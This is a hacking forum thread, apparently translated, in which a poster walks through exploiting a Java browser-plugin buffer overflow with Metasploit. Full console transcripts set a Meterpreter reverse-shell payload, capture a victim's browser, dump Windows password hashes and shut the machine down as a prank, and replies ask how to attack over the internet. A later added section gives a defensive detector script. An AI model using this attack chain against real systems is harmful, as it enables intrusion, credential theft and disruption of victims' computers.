
Exploiting a Java 0day with Metasploit

Posted: 27 Oct 2010, 18:14
by Skillmax
Well folks, I'm still entertaining myself with Metasploit, and this time I bring you the latest Java one these guys put out, called "java_docbase_bof"; the author is RuS0pr0. I went looking for some info besides what's in the Metasploit links, but I'm feeling kind of lazy so I didn't look much. The only thing I found quickly was a packet-storm link, where this one showed up first in the list of the 10 latest uploads, but when I went to look at it, it said "file missing". Bummer, but well, we have it in Metasploit, heh. OK, to arms:

We open Metasploit, load the exploit, and look at what the "info" command gives us:


 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 616 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10827 updated today (2010.10.26)

msf > use windows/browser/java_docbase_bof
msf exploit(java_docbase_bof) > info

       Name: Sun Java Runtime New Plugin docbase Buffer Overflow
    Version: 10820
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  jduck <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows Universal (msvcr71.dll ROP)

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1024
  Avoid: 34 characters

Description:
  This module exploits a flaw in the new plugin component of the Sun 
  Java Runtime Environment before v6 Update 22. By specifying specific 
  parameters to the new plugin, an attacker can cause a stack-based 
  buffer overflow and execute arbitrary code. When the new plugin is 
  invoked with a "launchjnlp" parameter, it will copy the contents of 
  the "docbase" parameter to a stack-buffer using the "sprintf" 
  function. A string of 396 bytes is enough to overflow the 256 byte 
  stack buffer and overwrite some local variables as well as the saved 
  return address. NOTE: The string being copied is first passed 
  through the "WideCharToMultiByte". Due to this, only characters 
  which have a valid localized multibyte representation are allowed. 
  Invalid characters will be replaced with question marks ('?'). This 
  vulnerability was originally discovered independently by both 
  Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive 
  testing hasn't been done, all versions since version 6 Update 10 are 
  believed to be affected by this vulnerability. This vulnerability 
  was patched as part of the October 2010 Oracle Patch release.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3552
  http://www.securityfocus.com/bid/44023
  http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html
  http://www.zerodayinitiative.com/advisories/ZDI-10-206/
  http://code.google.com/p/skylined/issues/detail?id=23
  http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/
  http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html



OK, now we know the parameters to configure; let's look at the available payloads:

msf exploit(java_docbase_bof) > show payloads 

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                             normal  Windows Executable Download and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)


OK, we configure everything and check that it's right:


msf exploit(java_docbase_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(java_docbase_bof) > set URIPATH /
URIPATH => /
msf exploit(java_docbase_bof) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_docbase_bof) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.101    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal (msvcr71.dll ROP)



All good, so exploit:

msf exploit(java_docbase_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.101:80/
[*] Server started.


We open the browser, enter the address, and the magic begins:


Image



msf exploit(java_docbase_bof) > [*] Sending exploit HTML to 192.168.1.100:1096
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1097) at Tue Oct 26 09:25:14 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1097) processing AutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)



The Meterpreter session migrates and the browser crashes. One good thing, compared with the previous one I posted, is that the exploit loads pretty fast and we have a shell almost instantly, reducing the chance that the victim closes the browser before Meterpreter migrates.


Image



We interact with the session, dump the hashes so we have something to play with later, and shut the remote box down; they'll blame Windows for shutting down on them:


msf exploit(java_docbase_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
ASPNET:1008:b29ace650td0c05f0bfa5a736ecadb63:fbcd22b2d8ed614f7cb996bf996ebf73:::
FDCC User:1005:921988ba001db8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
HelpAssistant:1004:58n8fff5b883a8711ae36084c7644de3:11a7f388fda7f3416d46e6526b346bd2:::
IUSR_XP_FDCC:1007:c36c50574cd910faaa15682618b8ea0c:2424cd6387fd1934538a7b22dc6873c7:::
IWAM_XP_FDCC:1013:640b1823bca93499f622ce50e7db4fd3:8186be975dbb9ec184fffb4ae512788a:::
Renamed_Admin:500:921988ba001db8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
Renamed_Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b656a8c9fc573685ded4bb5b3a4da7dc:::
User:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shutdown
Shutting down...


Image



meterpreter > 
[*] Meterpreter session 1 closed.  Reason: Died
-----

Let's go, INDETECTABLES!!
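An added example, not part of Skillmax's post nor code from the Metasploit module (which is written in Ruby): a small Python detector for the trigger shape the module description gives, that is, a Java plugin invocation carrying a "launchjnlp" parameter together with a "docbase" value at least as long as the 256-byte stack buffer that sprintf() writes into. The thread does not show the HTML the module serves, so the <object>/<param> layout, the omitted classid, the latin-1 stand-in for the victim's ANSI code page (the WideCharToMultiByte step the description mentions), and the sample pages are all assumptions constructed for this example.

```python
"""Flag HTML that invokes the Java plugin with launchjnlp plus an oversized docbase.

Added example, not from the thread or the Metasploit module. The 256-byte
buffer size and the 396-byte trigger length come from the module description;
the <object>/<param> layout and the sample pages below are constructed.
"""
from html.parser import HTMLParser

STACK_BUFFER_SIZE = 256   # stack buffer size given in the module description
DEMO_TRIGGER_LEN = 396    # length the description says is enough to overflow


class _PluginParamCollector(HTMLParser):
    """Collect name/value pairs for every <object>/<applet>/<embed> on a page."""

    def __init__(self):
        super().__init__()
        self.blocks = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {(k or "").lower(): (v or "") for k, v in attrs}
        if tag in ("object", "applet"):
            self._current = dict(attrs)       # tag attributes count as params too
            self.blocks.append(self._current)
        elif tag == "embed":
            self.blocks.append(dict(attrs))   # <embed> carries params as attributes
        elif tag == "param" and self._current is not None:
            self._current[attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag in ("object", "applet"):
            self._current = None


def narrowed_length(value):
    """Byte length of value after a lossy wide-to-multibyte narrowing.

    Approximates the WideCharToMultiByte step: a character with no single-byte
    representation becomes '?', so it still costs one byte of the stack buffer.
    latin-1 stands in for the victim's ANSI code page (assumption).
    """
    return len(value.encode("latin-1", errors="replace"))


def find_docbase_triggers(html):
    """Return one finding per plugin block that carries launchjnlp together with
    a docbase long enough to overrun the 256-byte stack buffer."""
    parser = _PluginParamCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for block in parser.blocks:
        if "launchjnlp" not in block or "docbase" not in block:
            continue  # the vulnerable sprintf() path needs both parameters
        length = narrowed_length(block["docbase"])
        if length >= STACK_BUFFER_SIZE:
            findings.append({"docbase_len": length, "launchjnlp": block["launchjnlp"]})
    return findings


# Constructed sample pages (not captured traffic). classid is omitted because
# the thread does not give it; a real page would carry the plugin's CLSID.
BENIGN_PAGE = (
    '<html><body><object width="1" height="1">'
    '<param name="launchjnlp" value="1">'
    '<param name="docbase" value="http://intranet.example/app/">'
    '</object></body></html>'
)
EXPLOIT_PAGE = (
    '<html><body><object width="1" height="1">'
    '<param name="launchjnlp" value="1">'
    '<param name="docbase" value="' + "A" * DEMO_TRIGGER_LEN + '">'
    '</object></body></html>'
)
# Same long docbase but no launchjnlp: the overflowing copy is never reached.
LONG_DOCBASE_NO_LAUNCH = (
    '<object><param name="docbase" value="' + "A" * DEMO_TRIGGER_LEN + '"></object>'
)
# Non-ANSI characters still occupy one byte each once narrowed to '?'.
UNICODE_PAGE = '<embed launchjnlp="1" docbase="' + "\u0416" * 300 + '">'

if __name__ == "__main__":
    for name, page in [("benign", BENIGN_PAGE), ("exploit", EXPLOIT_PAGE),
                       ("no-launchjnlp", LONG_DOCBASE_NO_LAUNCH), ("unicode", UNICODE_PAGE)]:
        print(name, find_docbase_triggers(page))
```

The length is measured after narrowing rather than on the raw attribute so that a docbase padded with characters the victim's code page cannot represent is not under-counted: each of them still lands in the buffer as a '?'.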

Re: Exploiting a Java 0day with Metasploit

Posted: 27 Oct 2010, 19:26
by rere2
If you want to do it over the WAN, would we have to put the public IP in SRVHOST and the private one in LHOST????

Thanks skill

Re: Exploiting a Java 0day with Metasploit

Posted: 01 Nov 2010, 17:56
by rudeboy1991
For me the browser shows "please wait..." and the console shows "sending exploit html to..."
But I wait 15 minutes and it stays the same, it doesn't progress.

The Java I'm using is update 16.

Re: Exploiting a Java 0day with Metasploit

Posted: 08 Nov 2010, 00:41
by crsi
I've been at it for a while and I get the same thing as rudeboy.

Re: Exploiting a Java 0day with Metasploit

Posted: 13 Nov 2010, 01:53
by Matatán
What's the little cow for?

       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

Hahaha

Re: Exploiting a Java 0day with Metasploit

Posted: 13 Nov 2010, 12:06
by Skillmax
D-ak wrote: What's the little cow for?

       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

Hahaha

It's the Metasploit cow, hehe.